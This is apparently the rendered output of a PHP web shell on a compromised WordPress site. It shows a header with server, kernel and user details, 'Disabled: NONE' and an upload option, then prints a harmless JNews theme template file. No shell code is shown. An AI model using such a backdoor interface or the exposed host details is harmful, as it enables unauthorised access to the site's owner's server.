HEX
Server: Apache
System: Linux mx52.hostgator.mx 5.14.0-687.12.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Sun Jun 7 14:39:27 EDT 2026 x86_64
User: narrativ (1644)
PHP: 8.2.33
Disabled: NONE
Upload Files
File: /home4/narrativ/public_html/wp-content/themes/jnews/single-custom-post-template.php
<?php
get_header();
the_post();
?>
    <div class="jeg_main">
        <div class="jeg_container">
            <div class="jeg_content">
                <div class="jeg_vc_content custom_post_template">
                    <?php the_content(); ?>
                </div>
            </div>
            <?php do_action('jnews_after_main'); ?>
        </div>
    </div>
<?php get_footer(); ?>